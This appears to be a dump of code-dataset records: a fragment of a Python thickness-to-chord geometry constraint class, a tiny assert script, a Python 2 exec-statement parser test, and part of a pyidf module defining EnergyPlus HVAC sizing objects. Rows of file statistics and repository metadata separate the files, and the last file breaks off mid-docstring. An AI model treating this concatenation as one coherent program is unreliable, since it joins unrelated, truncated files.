t = geo_utils.eDist(self.coords[4 * i], self.coords[4 * i + 1])
c = geo_utils.eDist(self.coords[4 * i + 2], self.coords[4 * i + 3])
ToC[i] = (t / c) / self.ToC0[i]
funcs[self.name] = ToC
def evalFunctionsSens(self, funcsSens, config):
"""
Evaluate the sensitivity of the functions this object has and
place in the funcsSens dictionary
Parameters
----------
funcsSens : dict
Dictionary to place function values
"""
nDV = self.DVGeo.getNDV()
if nDV > 0:
dToCdPt = np.zeros((self.nCon, self.coords.shape[0], self.coords.shape[1]))
for i in range(self.nCon):
t = geo_utils.eDist(self.coords[4 * i], self.coords[4 * i + 1])
c = geo_utils.eDist(self.coords[4 * i + 2], self.coords[4 * i + 3])
p1b, p2b = geo_utils.eDist_b(self.coords[4 * i, :], self.coords[4 * i + 1, :])
p3b, p4b = geo_utils.eDist_b(self.coords[4 * i + 2, :], self.coords[4 * i + 3, :])
dToCdPt[i, 4 * i, :] = p1b / c / self.ToC0[i]
dToCdPt[i, 4 * i + 1, :] = p2b / c / self.ToC0[i]
dToCdPt[i, 4 * i + 2, :] = (-p3b * t / c ** 2) / self.ToC0[i]
dToCdPt[i, 4 * i + 3, :] = (-p4b * t / c ** 2) / self.ToC0[i]
funcsSens[self.name] = self.DVGeo.totalSensitivity(dToCdPt, self.name, config=config)
def writeTecplot(self, handle):
"""
Write the visualization of this set of thickness constraints
to the open file handle
"""
handle.write("Zone T=%s\n" % self.name)
handle.write("Nodes = %d, Elements = %d ZONETYPE=FELINESEG\n" % (len(self.coords), len(self.coords) // 2))
handle.write("DATAPACKING=POINT\n")
for i in range(len(self.coords)):
handle.write(f"{self.coords[i, 0]:f} {self.coords[i, 1]:f} {self.coords[i, 2]:f}\n")
for i in range(len(self.coords) // 2):
handle.write("%d %d\n" % (2 * i + 1, 2 * i + 2))
| 38.892655
| 114
| 0.559849
| 895
| 6,884
| 4.275978
| 0.163128
| 0.120199
| 0.045989
| 0.05017
| 0.841651
| 0.841651
| 0.815783
| 0.804547
| 0.755945
| 0.722759
| 0
| 0.021609
| 0.29416
| 6,884
| 176
| 115
| 39.113636
| 0.766001
| 0.261621
| 0
| 0.525
| 0
| 0.025
| 0.063613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.0375
| 0
| 0.1625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
62f907dd7be7d32d307e2a352ac10a9affc6d2d7
| 78
|
py
|
Python
|
src/assert.py
|
kylerlmy/pythonpractice
|
6bdd329ac9adfc98c1cc4c37cc8581adad6018ad
|
[
"MIT"
] | null | null | null |
src/assert.py
|
kylerlmy/pythonpractice
|
6bdd329ac9adfc98c1cc4c37cc8581adad6018ad
|
[
"MIT"
] | null | null | null |
src/assert.py
|
kylerlmy/pythonpractice
|
6bdd329ac9adfc98c1cc4c37cc8581adad6018ad
|
[
"MIT"
] | null | null | null |
mylist=['item']
assert len(mylist) >=1
mylist.pop()
assert len(mylist)>=1
| 8.666667
| 22
| 0.653846
| 12
| 78
| 4.25
| 0.5
| 0.352941
| 0.588235
| 0.627451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029851
| 0.141026
| 78
| 9
| 23
| 8.666667
| 0.731343
| 0
| 0
| 0.5
| 0
| 0
| 0.051948
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1a1d0aca9ad7a1f8c6a3b5c0f2abf87826eb5231
| 188
|
py
|
Python
|
example/python2/test/parse/exec.py
|
rocky/python-spark
|
d3f966a4e8c191c51b1dcfa444026b4c6831984f
|
[
"MIT"
] | 43
|
2016-04-24T15:20:16.000Z
|
2022-03-19T21:01:29.000Z
|
example/python2/test/format/exec.py
|
rocky/python-spark
|
d3f966a4e8c191c51b1dcfa444026b4c6831984f
|
[
"MIT"
] | 11
|
2016-06-01T16:06:38.000Z
|
2020-05-20T20:15:32.000Z
|
example/python2/test/parse/exec.py
|
rocky/python-spark
|
d3f966a4e8c191c51b1dcfa444026b4c6831984f
|
[
"MIT"
] | 12
|
2016-05-24T12:15:04.000Z
|
2021-11-20T02:14:00.000Z
|
# Parsing and formatting tests for:
#
# exec_stmt ::=
# 'exec' expr ['in' test [',' test]]
exec 'exec-string' in locals, globals
exec 'exec-string' in dict
exec 'exec-string'
| 20.888889
| 48
| 0.62766
| 26
| 188
| 4.5
| 0.538462
| 0.205128
| 0.358974
| 0.273504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218085
| 188
| 8
| 49
| 23.5
| 0.795918
| 0.5
| 0
| 0
| 0
| 0
| 0.370787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c50f015e5e48cbb94961522c7fdbd3de007eb575
| 183,710
|
py
|
Python
|
pyidf/hvac_design_objects.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 19
|
2015-12-08T23:33:51.000Z
|
2022-01-31T04:41:10.000Z
|
pyidf/hvac_design_objects.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 2
|
2019-10-04T10:57:00.000Z
|
2021-10-01T06:46:17.000Z
|
pyidf/hvac_design_objects.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 7
|
2015-11-04T02:25:01.000Z
|
2021-12-08T03:14:28.000Z
|
""" Data objects in group "HVAC Design Objects"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class DesignSpecificationOutdoorAir(DataObject):
""" Corresponds to IDD object `DesignSpecification:OutdoorAir`
This object is used to describe general outdoor air requirements which
are referenced by other objects.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'outdoor air method',
{'name': u'Outdoor Air Method',
'pyname': u'outdoor_air_method',
'default': u'Flow/Person',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/Person',
u'Flow/Area',
u'Flow/Zone',
u'AirChanges/Hour',
u'Sum',
u'Maximum'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air flow per person',
{'name': u'Outdoor Air Flow per Person',
'pyname': u'outdoor_air_flow_per_person',
'default': 0.00944,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-person'}),
(u'outdoor air flow per zone floor area',
{'name': u'Outdoor Air Flow per Zone Floor Area',
'pyname': u'outdoor_air_flow_per_zone_floor_area',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s-m2'}),
(u'outdoor air flow per zone',
{'name': u'Outdoor Air Flow per Zone',
'pyname': u'outdoor_air_flow_per_zone',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'outdoor air flow air changes per hour',
{'name': u'Outdoor Air Flow Air Changes per Hour',
'pyname': u'outdoor_air_flow_air_changes_per_hour',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'1/hr'}),
(u'outdoor air flow rate fraction schedule name',
{'name': u'Outdoor Air Flow Rate Fraction Schedule Name',
'pyname': u'outdoor_air_flow_rate_fraction_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 1,
'name': u'DesignSpecification:OutdoorAir',
'pyname': u'DesignSpecificationOutdoorAir',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def outdoor_air_method(self):
"""field `Outdoor Air Method`
| Flow/Person => Outdoor Air Flow per Person * Occupancy = Design Flow Rate,
| Flow/Area => Outdoor Air Flow per Zone Floor Area * Zone Floor Area = Design Flow Rate,
| Flow/Zone => Outdoor Air Flow per Zone = Design Flow Rate,
| AirChanges/Hour => Outdoor Air Flow Air Changes per Hour * Zone Volume adjusted for m3/s = Design Flow Rate
| Default value: Flow/Person
Args:
value (str): value for IDD Field `Outdoor Air Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_method` or None if not set
"""
return self["Outdoor Air Method"]
@outdoor_air_method.setter
def outdoor_air_method(self, value="Flow/Person"):
"""Corresponds to IDD field `Outdoor Air Method`"""
self["Outdoor Air Method"] = value
@property
def outdoor_air_flow_per_person(self):
"""field `Outdoor Air Flow per Person`
| 0.00944 m3/s is equivalent to 20 cfm per person
| This input should be used if the field Outdoor Air Method is Flow/Person.
| This input is used if the field Outdoor Air Method is Flow/Person, Sum, or Maximum
| Units: m3/s-person
| Default value: 0.00944
Args:
value (float): value for IDD Field `Outdoor Air Flow per Person`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `outdoor_air_flow_per_person` or None if not set
"""
return self["Outdoor Air Flow per Person"]
@outdoor_air_flow_per_person.setter
def outdoor_air_flow_per_person(self, value=0.00944):
"""Corresponds to IDD field `Outdoor Air Flow per Person`"""
self["Outdoor Air Flow per Person"] = value
@property
def outdoor_air_flow_per_zone_floor_area(self):
"""field `Outdoor Air Flow per Zone Floor Area`
| This input should be used if the field Outdoor Air Method is Flow/Area.
| This input is used if the field Outdoor Air Method is Flow/Area, Sum, or Maximum
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Outdoor Air Flow per Zone Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `outdoor_air_flow_per_zone_floor_area` or None if not set
"""
return self["Outdoor Air Flow per Zone Floor Area"]
@outdoor_air_flow_per_zone_floor_area.setter
def outdoor_air_flow_per_zone_floor_area(self, value=None):
"""Corresponds to IDD field `Outdoor Air Flow per Zone Floor Area`"""
self["Outdoor Air Flow per Zone Floor Area"] = value
@property
def outdoor_air_flow_per_zone(self):
"""field `Outdoor Air Flow per Zone`
| This input should be used if the field Outdoor Air Method is Flow/Zone.
| This input is used if the field Outdoor Air Method is Flow/Zone, Sum, or Maximum
| Units: m3/s
Args:
value (float): value for IDD Field `Outdoor Air Flow per Zone`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `outdoor_air_flow_per_zone` or None if not set
"""
return self["Outdoor Air Flow per Zone"]
@outdoor_air_flow_per_zone.setter
def outdoor_air_flow_per_zone(self, value=None):
"""Corresponds to IDD field `Outdoor Air Flow per Zone`"""
self["Outdoor Air Flow per Zone"] = value
@property
def outdoor_air_flow_air_changes_per_hour(self):
"""field `Outdoor Air Flow Air Changes per Hour`
| This input should be used if the field Outdoor Air Method is AirChanges/Hour.
| This input is used if the field Outdoor Air Method is AirChanges/Hour, Sum, or Maximum
| Units: 1/hr
Args:
value (float): value for IDD Field `Outdoor Air Flow Air Changes per Hour`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `outdoor_air_flow_air_changes_per_hour` or None if not set
"""
return self["Outdoor Air Flow Air Changes per Hour"]
@outdoor_air_flow_air_changes_per_hour.setter
def outdoor_air_flow_air_changes_per_hour(self, value=None):
"""Corresponds to IDD field `Outdoor Air Flow Air Changes per Hour`"""
self["Outdoor Air Flow Air Changes per Hour"] = value
@property
def outdoor_air_flow_rate_fraction_schedule_name(self):
"""field `Outdoor Air Flow Rate Fraction Schedule Name`
| Schedule values are multiplied by the Outdoor Air Flow rate calculated using
| the previous four inputs. Schedule values are limited to 0 to 1.
Args:
value (str): value for IDD Field `Outdoor Air Flow Rate Fraction Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_flow_rate_fraction_schedule_name` or None if not set
"""
return self["Outdoor Air Flow Rate Fraction Schedule Name"]
@outdoor_air_flow_rate_fraction_schedule_name.setter
def outdoor_air_flow_rate_fraction_schedule_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Flow Rate Fraction Schedule
Name`"""
self["Outdoor Air Flow Rate Fraction Schedule Name"] = value
class DesignSpecificationZoneAirDistribution(DataObject):
""" Corresponds to IDD object `DesignSpecification:ZoneAirDistribution`
This object is used to describe zone air distribution in terms of air distribution
effectiveness and secondary recirculation fraction. It is referenced by Sizing:Zone
and Controller:MechanicalVentilation objects
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'zone air distribution effectiveness in cooling mode',
{'name': u'Zone Air Distribution Effectiveness in Cooling Mode',
'pyname': u'zone_air_distribution_effectiveness_in_cooling_mode',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'zone air distribution effectiveness in heating mode',
{'name': u'Zone Air Distribution Effectiveness in Heating Mode',
'pyname': u'zone_air_distribution_effectiveness_in_heating_mode',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'zone air distribution effectiveness schedule name',
{'name': u'Zone Air Distribution Effectiveness Schedule Name',
'pyname': u'zone_air_distribution_effectiveness_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone secondary recirculation fraction',
{'name': u'Zone Secondary Recirculation Fraction',
'pyname': u'zone_secondary_recirculation_fraction',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 1,
'name': u'DesignSpecification:ZoneAirDistribution',
'pyname': u'DesignSpecificationZoneAirDistribution',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def zone_air_distribution_effectiveness_in_cooling_mode(self):
"""field `Zone Air Distribution Effectiveness in Cooling Mode`
| Units: dimensionless
| Default value: 1.0
Args:
value (float): value for IDD Field `Zone Air Distribution Effectiveness in Cooling Mode`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_air_distribution_effectiveness_in_cooling_mode` or None if not set
"""
return self["Zone Air Distribution Effectiveness in Cooling Mode"]
@zone_air_distribution_effectiveness_in_cooling_mode.setter
def zone_air_distribution_effectiveness_in_cooling_mode(self, value=1.0):
"""Corresponds to IDD field `Zone Air Distribution Effectiveness in
Cooling Mode`"""
self["Zone Air Distribution Effectiveness in Cooling Mode"] = value
@property
def zone_air_distribution_effectiveness_in_heating_mode(self):
"""field `Zone Air Distribution Effectiveness in Heating Mode`
| Units: dimensionless
| Default value: 1.0
Args:
value (float): value for IDD Field `Zone Air Distribution Effectiveness in Heating Mode`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_air_distribution_effectiveness_in_heating_mode` or None if not set
"""
return self["Zone Air Distribution Effectiveness in Heating Mode"]
@zone_air_distribution_effectiveness_in_heating_mode.setter
def zone_air_distribution_effectiveness_in_heating_mode(self, value=1.0):
"""Corresponds to IDD field `Zone Air Distribution Effectiveness in
Heating Mode`"""
self["Zone Air Distribution Effectiveness in Heating Mode"] = value
@property
def zone_air_distribution_effectiveness_schedule_name(self):
"""field `Zone Air Distribution Effectiveness Schedule Name`
| optionally used to replace Zone Air Distribution Effectiveness in Cooling and
| Heating Mode
Args:
value (str): value for IDD Field `Zone Air Distribution Effectiveness Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_air_distribution_effectiveness_schedule_name` or None if not set
"""
return self["Zone Air Distribution Effectiveness Schedule Name"]
@zone_air_distribution_effectiveness_schedule_name.setter
def zone_air_distribution_effectiveness_schedule_name(self, value=None):
"""Corresponds to IDD field `Zone Air Distribution Effectiveness
Schedule Name`"""
self["Zone Air Distribution Effectiveness Schedule Name"] = value
@property
def zone_secondary_recirculation_fraction(self):
"""field `Zone Secondary Recirculation Fraction`
| Units: dimensionless
Args:
value (float): value for IDD Field `Zone Secondary Recirculation Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_secondary_recirculation_fraction` or None if not set
"""
return self["Zone Secondary Recirculation Fraction"]
@zone_secondary_recirculation_fraction.setter
def zone_secondary_recirculation_fraction(self, value=None):
"""Corresponds to IDD field `Zone Secondary Recirculation Fraction`"""
self["Zone Secondary Recirculation Fraction"] = value
class SizingParameters(DataObject):
""" Corresponds to IDD object `Sizing:Parameters`
Specifies global heating and cooling sizing factors/ratios.
These ratios are applied at the zone level to all of the zone heating and cooling loads
and air flow rates. Then these new loads and air flow rates are used to calculate the
system level flow rates and capacities and are used in all component sizing calculations.
Specifies the width (in load timesteps) of a moving average window
which is used to smooth the peak load across more than one timestep.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'heating sizing factor',
{'name': u'Heating Sizing Factor',
'pyname': u'heating_sizing_factor',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'cooling sizing factor',
{'name': u'Cooling Sizing Factor',
'pyname': u'cooling_sizing_factor',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'timesteps in averaging window',
{'name': u'Timesteps in Averaging Window',
'pyname': u'timesteps_in_averaging_window',
'required-field': False,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 1,
'name': u'Sizing:Parameters',
'pyname': u'SizingParameters',
'required-object': False,
'unique-object': True}
@property
def heating_sizing_factor(self):
"""field `Heating Sizing Factor`
| Default value: 1.0
Args:
value (float): value for IDD Field `Heating Sizing Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_sizing_factor` or None if not set
"""
return self["Heating Sizing Factor"]
@heating_sizing_factor.setter
def heating_sizing_factor(self, value=1.0):
"""Corresponds to IDD field `Heating Sizing Factor`"""
self["Heating Sizing Factor"] = value
@property
def cooling_sizing_factor(self):
"""field `Cooling Sizing Factor`
| Default value: 1.0
Args:
value (float): value for IDD Field `Cooling Sizing Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_sizing_factor` or None if not set
"""
return self["Cooling Sizing Factor"]
@cooling_sizing_factor.setter
def cooling_sizing_factor(self, value=1.0):
"""Corresponds to IDD field `Cooling Sizing Factor`"""
self["Cooling Sizing Factor"] = value
@property
def timesteps_in_averaging_window(self):
"""field `Timesteps in Averaging Window`
| blank => set the timesteps in averaging window to
| Number of Timesteps per Hour resulting in a 1 hour averaging window
| default is number of timesteps for 1 hour averaging window
| value >= 1
Args:
value (int): value for IDD Field `Timesteps in Averaging Window`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `timesteps_in_averaging_window` or None if not set
"""
return self["Timesteps in Averaging Window"]
@timesteps_in_averaging_window.setter
def timesteps_in_averaging_window(self, value=None):
"""Corresponds to IDD field `Timesteps in Averaging Window`"""
self["Timesteps in Averaging Window"] = value
class SizingZone(DataObject):
""" Corresponds to IDD object `Sizing:Zone`
Specifies the data needed to perform a zone design air flow calculation.
The calculation is done for every sizing period included in the input. The maximum
cooling and heating load and cooling, heating, and ventilation air flows are then saved
for system level and zone component design calculations.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'zone or zonelist name',
{'name': u'Zone or ZoneList Name',
'pyname': u'zone_or_zonelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone cooling design supply air temperature input method',
{'name': u'Zone Cooling Design Supply Air Temperature Input Method',
'pyname': u'zone_cooling_design_supply_air_temperature_input_method',
'default': u'SupplyAirTemperature',
'required-field': True,
'autosizable': False,
'accepted-values': [u'SupplyAirTemperature',
u'TemperatureDifference'],
'autocalculatable': False,
'type': 'alpha'}),
(u'zone cooling design supply air temperature',
{'name': u'Zone Cooling Design Supply Air Temperature',
'pyname': u'zone_cooling_design_supply_air_temperature',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'zone cooling design supply air temperature difference',
{'name': u'Zone Cooling Design Supply Air Temperature Difference',
'pyname': u'zone_cooling_design_supply_air_temperature_difference',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'deltaC'}),
(u'zone heating design supply air temperature input method',
{'name': u'Zone Heating Design Supply Air Temperature Input Method',
'pyname': u'zone_heating_design_supply_air_temperature_input_method',
'default': u'SupplyAirTemperature',
'required-field': True,
'autosizable': False,
'accepted-values': [u'SupplyAirTemperature',
u'TemperatureDifference'],
'autocalculatable': False,
'type': 'alpha'}),
(u'zone heating design supply air temperature',
{'name': u'Zone Heating Design Supply Air Temperature',
'pyname': u'zone_heating_design_supply_air_temperature',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'zone heating design supply air temperature difference',
{'name': u'Zone Heating Design Supply Air Temperature Difference',
'pyname': u'zone_heating_design_supply_air_temperature_difference',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'deltaC'}),
(u'zone cooling design supply air humidity ratio',
{'name': u'Zone Cooling Design Supply Air Humidity Ratio',
'pyname': u'zone_cooling_design_supply_air_humidity_ratio',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'zone heating design supply air humidity ratio',
{'name': u'Zone Heating Design Supply Air Humidity Ratio',
'pyname': u'zone_heating_design_supply_air_humidity_ratio',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'design specification outdoor air object name',
{'name': u'Design Specification Outdoor Air Object Name',
'pyname': u'design_specification_outdoor_air_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone heating sizing factor',
{'name': u'Zone Heating Sizing Factor',
'pyname': u'zone_heating_sizing_factor',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real'}),
(u'zone cooling sizing factor',
{'name': u'Zone Cooling Sizing Factor',
'pyname': u'zone_cooling_sizing_factor',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real'}),
(u'cooling design air flow method',
{'name': u'Cooling Design Air Flow Method',
'pyname': u'cooling_design_air_flow_method',
'default': u'DesignDay',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/Zone',
u'DesignDay',
u'DesignDayWithLimit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling design air flow rate',
{'name': u'Cooling Design Air Flow Rate',
'pyname': u'cooling_design_air_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling minimum air flow per zone floor area',
{'name': u'Cooling Minimum Air Flow per Zone Floor Area',
'pyname': u'cooling_minimum_air_flow_per_zone_floor_area',
'default': 0.000762,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'cooling minimum air flow',
{'name': u'Cooling Minimum Air Flow',
'pyname': u'cooling_minimum_air_flow',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling minimum air flow fraction',
{'name': u'Cooling Minimum Air Flow Fraction',
'pyname': u'cooling_minimum_air_flow_fraction',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating design air flow method',
{'name': u'Heating Design Air Flow Method',
'pyname': u'heating_design_air_flow_method',
'default': u'DesignDay',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/Zone',
u'DesignDay',
u'DesignDayWithLimit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating design air flow rate',
{'name': u'Heating Design Air Flow Rate',
'pyname': u'heating_design_air_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating maximum air flow per zone floor area',
{'name': u'Heating Maximum Air Flow per Zone Floor Area',
'pyname': u'heating_maximum_air_flow_per_zone_floor_area',
'default': 0.002032,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'heating maximum air flow',
{'name': u'Heating Maximum Air Flow',
'pyname': u'heating_maximum_air_flow',
'default': 0.1415762,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating maximum air flow fraction',
{'name': u'Heating Maximum Air Flow Fraction',
'pyname': u'heating_maximum_air_flow_fraction',
'default': 0.3,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'design specification zone air distribution object name',
{'name': u'Design Specification Zone Air Distribution Object Name',
'pyname': u'design_specification_zone_air_distribution_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'account for dedicated outdoor air system',
{'name': u'Account for Dedicated Outdoor Air System',
'pyname': u'account_for_dedicated_outdoor_air_system',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'dedicated outdoor air system control strategy',
{'name': u'Dedicated Outdoor Air System Control Strategy',
'pyname': u'dedicated_outdoor_air_system_control_strategy',
'default': u'NeutralSupplyAir',
'required-field': False,
'autosizable': False,
'accepted-values': [u'NeutralSupplyAir',
u'NeutralDehumidifiedSupplyAir',
u'ColdSupplyAir'],
'autocalculatable': False,
'type': 'alpha'}),
(u'dedicated outdoor air low setpoint temperature for design',
{'name': u'Dedicated Outdoor Air Low Setpoint Temperature for Design',
'pyname': u'dedicated_outdoor_air_low_setpoint_temperature_for_design',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'dedicated outdoor air high setpoint temperature for design',
{'name': u'Dedicated Outdoor Air High Setpoint Temperature for Design',
'pyname': u'dedicated_outdoor_air_high_setpoint_temperature_for_design',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'C'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 18,
'name': u'Sizing:Zone',
'pyname': u'SizingZone',
'required-object': False,
'unique-object': False}
@property
def zone_or_zonelist_name(self):
"""field `Zone or ZoneList Name`
Args:
value (str): value for IDD Field `Zone or ZoneList Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_or_zonelist_name` or None if not set
"""
return self["Zone or ZoneList Name"]
@zone_or_zonelist_name.setter
def zone_or_zonelist_name(self, value=None):
"""Corresponds to IDD field `Zone or ZoneList Name`"""
self["Zone or ZoneList Name"] = value
@property
def zone_cooling_design_supply_air_temperature_input_method(self):
"""field `Zone Cooling Design Supply Air Temperature Input Method`
| Default value: SupplyAirTemperature
Args:
value (str): value for IDD Field `Zone Cooling Design Supply Air Temperature Input Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_cooling_design_supply_air_temperature_input_method` or None if not set
"""
return self["Zone Cooling Design Supply Air Temperature Input Method"]
@zone_cooling_design_supply_air_temperature_input_method.setter
def zone_cooling_design_supply_air_temperature_input_method(
self,
value="SupplyAirTemperature"):
"""Corresponds to IDD field `Zone Cooling Design Supply Air Temperature
Input Method`"""
self["Zone Cooling Design Supply Air Temperature Input Method"] = value
@property
def zone_cooling_design_supply_air_temperature(self):
"""field `Zone Cooling Design Supply Air Temperature`
| Zone Cooling Design Supply Air Temperature is only used when Zone Cooling Design
| Supply Air Temperature Input Method = SupplyAirTemperature
| Units: C
Args:
value (float): value for IDD Field `Zone Cooling Design Supply Air Temperature`
Raises:
